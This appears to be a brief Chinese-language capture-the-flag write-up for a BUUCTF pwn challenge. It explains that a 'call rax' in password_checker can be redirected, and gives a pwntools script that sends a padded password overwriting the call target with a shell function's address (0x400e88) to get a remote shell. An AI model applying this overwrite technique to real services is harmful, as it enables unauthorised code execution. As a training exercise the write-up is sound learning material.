exp 腳本
C++寫的程序,逆向分析有點費勁。注意到 password_checker 有 call rax 指令,倒推 rax 的來源,在 main 函數中把 rax 的來源覆蓋為漏洞函數的地址即可 get shell
from pwn import *
io = remote('node3.buuoj.cn',27283)
shell = 0x400e88
io.sendlineafter(': ','admin')
io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell))
io.interactive()
感謝 keer 師傅的指點!
